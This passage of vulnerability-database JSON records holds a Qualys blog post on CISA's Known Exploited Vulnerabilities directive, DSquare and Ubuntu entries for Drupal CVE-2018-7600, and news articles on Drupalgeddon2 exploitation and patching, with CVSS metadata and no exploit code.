"CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104"], "modified": "2021-07-29T00:20:27", "id": "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. 
It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d; this will be an ongoing effort, as CISA frequently amends the catalog with the latest CVEs as part of its regular feeds.\n\nFor these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. 
The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. 
With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities listed by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help them comply with the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? 
Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", 
"CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", 
"CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "dsquare": [{"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 7 SA-CORE-2018-002 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-08T00:00:00", "id": "E-639", "href": "", "sourceData": "For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:33:45", "description": "Remote command execution vulnerability in Drupal core/lib/Drupal/Core/DrupalKernel.php\n\nVulnerability Type: Remote Command Execution", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-08T00:00:00", "type": "dsquare", "title": "Drupal 8 SA-CORE-2018-002 RCE", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-05-08T00:00:00", "id": "E-638", "href": "", "sourceData": 
"For the exploit source code contact DSquare Security sales team.", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-01-26T14:41:26", "description": "Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before\n8.5.1 allows remote attackers to execute arbitrary code because of an issue\naffecting multiple subsystems with default or common module configurations.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=894259>\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "ubuntucve", "title": "CVE-2018-7600", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-03-29T00:00:00", "id": "UB:CVE-2018-7600", "href": "https://ubuntu.com/security/CVE-2018-7600", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "thn": [{"lastseen": "2022-05-09T12:40:30", "description": "[](<https://thehackernews.com/images/-gX6_9UgesoQ/WxZDSXy_kxI/AAAAAAAAw7s/DgAtVJgBWSMc7xSNuowSunrFzg-X0mqrQCLcBGAs/s728-e100/drupal-hacking.png>)\n\nHundreds of thousands of websites 
running on the Drupal CMS\u2014including those of major educational institutions and government organizations around the world\u2014have been found vulnerable to a [highly critical flaw](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) for which security patches were released almost two months ago. \n \nSecurity researcher Troy Mursch scanned the whole Internet and [found](<https://badpackets.net/over-100000-drupal-websites-vulnerable-to-drupalgeddon-2-cve-2018-7600/>) over 115,000 Drupal websites are still vulnerable to the Drupalgeddon2 flaw despite repetitive warnings. \n \n[Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) (CVE-2018-7600) is a highly critical remote code execution vulnerability discovered late March in Drupal CMS software (versions < 7.58 / 8.x < 8.3.9 / 8.4.x < 8.4.6 / 8.5.x < 8.5.1) that could allow attackers to completely take over vulnerable websites. \n \nFor those unaware, Drupalgeddon2 allows an unauthenticated, remote attacker to execute malicious code on default or standard Drupal installations under the privileges of the user. \n \nSince Drupalgeddon2 had much potential to derive attention of motivated attackers, the company urged all website administrators to install security patches immediately after it was released in late March and decided not to release any technical details of the flaw initially. \n\n\n[](<https://thehackernews.com/images/-qvQEU0cUz6E/WxY-T5CZxNI/AAAAAAAAw7U/EIiGG2uydmwMhw368wlEM0s5XzpFMGG8ACLcBGAs/s728-e100/drupal-hacking-exploit.png>)\n\nHowever, attackers started exploiting the vulnerability only two weeks after complete details and proof-of-concept (PoC) [exploit code of Drupalgeddon2](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) was published online, which was followed by large-scale Internet scanning and exploitation attempts. 
\n \nShortly after that, we saw attackers develop [automated exploits](<https://thehackernews.com/2018/04/drupal-rce-exploit-code.html>) leveraging the Drupalgeddon2 vulnerability to inject [cryptocurrency miners](<https://thehackernews.com/2018/04/drupal-cryptocurrency-hacking.html>), backdoors, and other malware into websites within a few hours after its details went public. \n \nMursch scanned the Internet and found nearly 500,000 websites running Drupal 7, of which 115,070 were still running an outdated version of Drupal vulnerable to Drupalgeddon2. \n \nWhile analyzing vulnerable websites, Mursch noticed that hundreds of them\u2014including those of the Belgian police department, the Colorado Attorney General's office, Fiat subsidiary Magneti Marelli and a food truck locating service\u2014had already been targeted by a new cryptojacking campaign. \n \nMursch also found some infected websites in the campaign that had already been upgraded to the latest Drupal version, but the cryptojacking malware was still present: patching closes the entry point but does not remove what an attacker already installed. 
\n \nWe have been warning users since March that if you are already infected with the malware, merely updating your Drupal website would not remove the \"backdoors or fix compromised sites.\" To fully resolve the issue you are recommended to follow this [Drupal guide](<https://www.drupal.org/node/2365547>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-05T08:06:00", "type": "thn", "title": "Over 115,000 Drupal Sites Still Vulnerable to Drupalgeddon2 Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T08:06:24", "id": "THN:8D76D821D51DF9AAAAF1C9D1FA8CA0C5", "href": "https://thehackernews.com/2018/06/drupalgeddon2-exploit.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:36", "description": "[](<https://thehackernews.com/images/-5T7PpU6AWTk/WtG6Fi7QwCI/AAAAAAAAwOw/y5fEvJ9j7kM_-JbVZmCYg_FMATnvpYzmACLcBGAs/s728-e100/hacking-drupal-remote-code-execution-exploit-code.png>)\n\nHackers have started exploiting a recently disclosed critical vulnerability in Drupal shortly after the public release of 
working exploit code. \n \nTwo weeks ago, the Drupal security team [discovered](<https://www.drupal.org/sa-core-2018-002>) a highly critical remote code execution vulnerability, dubbed **Drupalgeddon2**, in its content management system software that could allow attackers to completely take over vulnerable websites. \n \nTo address this vulnerability the company immediately released updated versions of Drupal CMS without releasing any technical details of the vulnerability, giving more than a million sites enough time to patch the issue. \n \nTwo days ago, security researchers at Check Point and Dofinity [published](<https://research.checkpoint.com/uncovering-drupalgeddon-2/>) complete technical details about this vulnerability (CVE-2018-7600), after which a Russian security researcher published a proof-of-concept (PoC) [exploit code](<https://github.com/a2u/CVE-2018-7600/blob/master/exploit.py>) for Drupalgeddon2 on GitHub. \n \nThe Drupalgeddon2 vulnerability, which affects all versions of Drupal from 6 to 8, allows an unauthenticated, remote attacker to execute malicious code on default or common Drupal installations. \n\n\n[](<https://thehackernews.com/images/-qsxcL4GQ5_Y/WtG9rLLIcyI/AAAAAAAAwO8/acsBgkJ4gYYe5c5Vnk2t2l3f-S95bTrBgCLcBGAs/s728-e100/drupal-exploit.png>)\n\n \nAccording to Check Point's disclosure, the vulnerability exists due to insufficient sanitization of inputs passed via Form API (FAPI) AJAX requests. \n \n\n\n> \"As a result, this enabled an attacker to potentially inject a malicious payload into the internal form structure. This would have caused Drupal to execute it without user authentication,\" Check Point researchers said. 
\n\n> \"By exploiting this vulnerability, an attacker would have been able to carry out a full site takeover of any Drupal customer.\"\n\n \nHowever, shortly after the public release of the PoC exploit, which many confirmed to be functional, researchers at [Sucuri](<https://twitter.com/danielcid/status/984555586644688898>), [Imperva](<https://www.imperva.com/blog/2018/04/drupalgeddon-2-0-are-hackers-slacking-off/>), and the [SANS](<https://isc.sans.edu/forums/diary/Drupal+CVE20187600+PoC+is+Public/23549/>) Internet Storm Center started seeing attempts to exploit Drupalgeddon2, though none had yet seen any reports of websites actually being compromised. \n \nSite administrators still running vulnerable versions of Drupal are highly recommended to patch the vulnerability by updating their CMS to Drupal 7.58 or Drupal 8.5.1 (or to 8.3.9 / 8.4.6 for sites still on those older 8.x branches) as soon as possible to avoid exploits. \n \nThe vulnerability also affects Drupal 6, which has not been supported since February 2016, but a patch for that version has still been created.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-04-14T08:29:00", "type": "thn", "title": "Hackers Have Started Exploiting Drupal RCE Exploit Released Yesterday", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": 